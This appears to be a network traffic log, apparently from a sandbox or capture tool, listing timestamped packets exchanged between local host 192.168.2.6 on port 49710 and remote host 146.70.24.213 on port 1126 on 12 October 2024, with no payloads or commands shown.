Oct 12, 2024 20:30:05.598726988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598761082 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598771095 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.598793983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598826885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598834991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.598860025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598906040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.598920107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598953009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.598989010 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599231005 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599282026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599333048 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599359035 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599366903 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599414110 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599420071 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599452972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599498987 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599509001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599560976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599595070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599608898 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599627972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599661112 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599669933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599694014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599735022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599744081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599778891 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599828005 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599838972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599889994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599924088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599935055 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.599961996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.599993944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600003004 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.600027084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600059986 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600066900 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.600089073 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600121975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600137949 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.600155115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600187063 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600200891 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.600222111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600253105 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600264072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.600287914 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.600330114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.601322889 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601377010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601428032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601432085 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.601461887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601504087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.601511955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601564884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601615906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601625919 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.601650000 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601682901 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601696968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.601716995 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601748943 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601759911 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.601783037 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601814985 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601839066 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.601849079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601881027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601890087 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.601916075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601968050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.601979971 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.602001905 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.602036953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.602046013 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.602071047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.602103949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.602113008 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.602137089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.602180004 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.603730917 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.603785038 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.603813887 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.603838921 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.603869915 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.603914022 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.603921890 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.603974104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604007006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604018927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604041100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604074001 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604087114 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604124069 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604156971 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604165077 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604191065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604223013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604231119 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604273081 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604306936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604315042 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604356050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604401112 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604408026 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604460955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604495049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604506969 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604546070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604579926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604588985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604613066 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604645014 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604652882 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604679108 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604712009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604717016 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604746103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604778051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604789972 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604810953 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604840994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604849100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604902029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604934931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.604944944 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.604969025 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605001926 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605032921 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.605036020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605070114 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605076075 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.605106115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605139017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605153084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.605174065 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605206013 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605216026 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.605241060 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605274916 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605299950 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.605308056 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605340004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.605350018 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.648602962 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.689441919 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.689503908 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.689538002 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.689573050 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.689605951 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.689611912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.689611912 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.689640045 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.689678907 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.689687014 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.689707994 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.689760923 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.691576958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691606998 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691658974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691659927 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.691710949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691744089 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691766977 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.691795111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691845894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691847086 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.691883087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691915989 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691942930 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.691956043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.691991091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692003965 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692024946 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692056894 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692068100 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692091942 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692120075 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692151070 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692193031 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692255020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692255020 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692311049 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692362070 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692379951 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692394972 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692430973 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692445040 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692465067 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692498922 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692507029 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692533016 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692568064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692579985 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692600965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692635059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692648888 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692670107 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692703009 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692714930 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692737103 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692770958 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692783117 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692802906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692837954 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692853928 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692872047 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692904949 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692935944 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.692939043 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692974091 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.692992926 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.693006992 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.693041086 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.693073034 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.693078995 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.693104982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.693115950 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.693136930 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.693171978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.693181992 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.693200111 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.693240881 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.693876982 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694015980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694046974 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694063902 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694096088 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694129944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694145918 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694180965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694215059 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694231987 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694247961 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694282055 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694291115 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694315910 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694349051 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694367886 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694381952 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694416046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694442987 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694448948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694480896 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694504976 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694509983 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694542885 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694549084 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694580078 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694612980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694638968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694648981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694684029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694696903 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.694717884 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.694766045 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696357965 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696388006 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696438074 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696439028 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696472883 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696504116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696522951 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696538925 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696579933 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696593046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696645975 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696679115 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696690083 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696712017 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696741104 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696746111 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696789980 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696825027 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696841002 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696856976 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696890116 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696898937 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696922064 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.696963072 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.696976900 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697009087 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697041988 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697050095 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697073936 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697113991 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697124004 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697156906 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697190046 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697197914 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697222948 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697257996 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697268009 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697289944 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697323084 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697326899 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697355032 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697390079 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697412968 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697422981 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697458029 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697463036 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697490931 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697525978 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697540045 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697560072 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697592020 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697602034 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697623968 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697658062 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697669983 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697690010 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697722912 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697734118 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697756052 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697791100 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697818041 CEST	49710	1126	192.168.2.6	146.70.24.213
Oct 12, 2024 20:30:05.697824955 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697860003 CEST	1126	49710	146.70.24.213	192.168.2.6
Oct 12, 2024 20:30:05.697876930 CEST	49710	1126	192.168.2.6	146.70.24.213
